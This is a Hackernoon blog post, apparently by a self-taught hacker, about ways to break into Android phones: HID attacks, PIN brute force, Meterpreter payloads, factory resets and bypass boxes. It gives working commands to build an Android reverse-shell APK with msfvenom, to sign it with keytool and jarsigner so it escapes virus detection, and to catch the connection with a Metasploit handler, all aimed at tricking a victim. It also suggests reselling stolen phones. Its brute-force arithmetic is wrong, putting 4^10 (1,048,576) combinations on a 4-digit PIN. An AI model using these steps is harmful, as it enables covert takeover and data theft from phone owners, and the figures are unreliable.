Hackernoon logohacking android phones by@morpheuslord

hacking android phones

Morpheuslord Hacker Noon profile picture

@morpheuslordMorpheuslord

I am an ethical hacker who learned hacking from youtube. I like to help people with the learning of necessary skills.

In this article, we are looking into the depths of how hackers hack into the phones of victims and steal their data for malicious purposes several attacks rise every day and these are getting more dangerous for their users. androids are the go-to option for phones because of their cost and use. phones are the addiction that every person above the age of 10 commonly has and some have no life without it. its a source of income a source of livelihood to many people

The most commonly used methods used by attackers to exploit a phone are increasing like people are really busy finding new exploits and bypass and some of them are:-

  • HID ATTACK (Human Interface Device)
  • Password BruteForce
  • Payloads (Custom hacking scripts)
  • Factory Reset
  • Bypass
HID

The HID attack is a scenario in which an attacker takes a programmable embedded development platform an associated software package such as SET(Social Engineering Toolkit), Metasploit, etc. or use other phones and USB's which are programmed to be a RubberDucky and execute an attack

In such an attack the hacker installs a backdoor and by using that he completely downloads the target's in.

Using the info he can do anything ether hack into the bank account of the person or even sell them on the dark web you can check my another article about the dark web to learn more about this coming back they sell the info to other hackers in exchange of crypto-currency for example bitcoin.

You can see how a hid attack is conducted from the

android infosec
channel

note:- you can conduct a brute-force pin of an android phone using this method

Login Bruteforce

A brute-force attack uses the trial and error method to guess the correct password of the phone to open the phone to access it

Some things are really important to consider to conduct such an attack :

  • number of passwords
  • the timeout
  • the time it might take

the timeout:-

After 5 Wrong pin's - 30 sec delay
After 1 Wrong pin's - 30 sec delay
After 41 Wrong pin's - 30 sec delay

the number of passwords:-

The total number of possible combinations for a 4 digit lock can start from 4 zeros to 4 nines which means 0000-9999 so we have about :

4^10 amount of password

or

1048576 passwords in total

time consumed:-

So we have to take possibilities 1,2&3 to expect the total time consumed so let's get into it

possibility 1:-

5 passwords wrong delay 30 sec and we need to find out how many times we get the delay in the first place and find the total time consumed

total delay
1048576/5 = 209715.2 times

total time
209715.2 * 30 = 6291456 sec

or

1747.6266 hours

possibility 2:-

1 password's wrong delay 30 sec and we need to find out how many times we get the delay in the first place and find the total time consumed which in this case will be in decades

total time is 
1048576 * 30 = 31457280

or 

5171059 years

Now if I am the hacker I will never hack this system who the hell will take such a headache to get access to a stupid person's phone instead I would format the whole system

possibility 3:-

41 passwords wrong delay 30 sec and we need to find out how many times we get the delay at the first place and find the total time consumed is really less than the second possibility

total delays
1048576 / 41 = 25,575.0243 delays

total time consumed 
25575.0243 * 30 = 7,67,250.729 sec

or 

767250.729 / 60 = 12,787.5121 min

or

12,787.51215 hours 

this is how this ends up it is completely impossible to find the person's phone's password by brute-forcing you will be dead by the time you find the phone's password 😣.

Payloads

Payloads are the simple script that helps a hacker to hack a system so now if I just trick the person to authorize and install the .apk file which opens a back door for Meterpreter to listen on for a connection to get the system under its control.

meterpreter reverse tcp payload creation command:

msfvenom –p android/meterpreter/reverse_tcp LHOST=Localhost IP  LPORT=LocalPort R > android_shell.apk

Payload is -p to be used, LHOST Localhost IP to receive a back connection (Check yours with if-config command), LPORT Localhost port on which the connection listen for the victim (we set it to 4444), R Raw format (we select .apk), Location To save the file.

We need to provide a certificate to the .apk file to give it an identity we need to sign a cert for a .apk file to give it recognition as an application without this the .apk file will be recognized as a virus

To assign a cert you must follow these steps

install the programs:-

  • Keytool
  • jar signer
  • Zipalign

Sign the .apk file locally:-

 keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000

Keytool making Keystore:-

 jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android_shell.apk hacked

Signing a .apk file with JARsigner:-

 jarsigner -verify -verbose -certs android_shell.apk

install and use Zipalign:-

installing :

 sudo apt-get install zipalign 

or

 sudo apt install zipalign

using :

 zipalign -v 4 android_shell.apk singed_jar.apk

Now thinking that the victim has installed the .apk now let's listen to them the command for that is in the Metasploit console:-

use exploit/multi/handler

And set the various parameters in Metasploit like the lhost, lport, etc now you need to run the command after setting the host and port type:

type:
run (and press enter)

After you execute this code you will receive a connection to the target system using this you can access the whole system and gain full access to the system using this you can download the whole system it is your wish.

Factory Reset

A flashed phone is a device where a different ROM/operating system has been flashed on top of the system that came with the phone. Often, phones can be flashed to appear unlocked, whereas, in reality, they are still carrier-branded phones that will not be compatible with our service.

For every phone, there are different method's for factory reset the most common is to do it via the volume buttons and the power button for example I have an old oppo phone for which the factory reset combination is down volume button and power button and for 5 seconds and the phone is flashed.

Flashed this method is non-time consuming and you will get a brand new phone I think that is enough so if you have a stolen phone just resell it in Olx you might get a good amount who knows.

Bypass

Bypass is a commonly used method by law enforcement like the CIA, FBI & in India the IB & RAW they use a special device which looks like a simple box looking device

In such kind of attack's it mainly depends on the attacker using the IP_BOX which works mainly on the Bruteforcing of the target this is mainly used by law enforcement to get into phones of terrorist's cybercriminals and other criminals phones for their information

you can use another tool known as the BashBunny from hak5 this is a mini-computer a Debian based computer from which u can conduct a login Bruteforce attack and unlike the other options above this is a serious beast in its work in a matter of hours you can crack the most difficult of difficult passwords with ease.

NOTE

Hacking into other's phones is a crime obviously and if you do some other activity such as hacking the system can seriously get you into a lot of trouble and can even put you behind bars.

sources

Many of you might find my article similar to many other articles so I want to clarify that this article is similar because it is related to hacking so it is common to be similar as we use a lot of definitions to keep the content simple for you readers and this is not plagiarism.

follow me

Follow my Twitter account for the latest updates

Morpheuslord Hacker Noon profile picture
by Morpheuslord @morpheuslord. I am an ethical hacker who learned hacking from youtube. I like to help people with the learning of necessary skills.Read my stories

Tags

Join Hacker Noon

Create your free account to unlock your custom reading experience.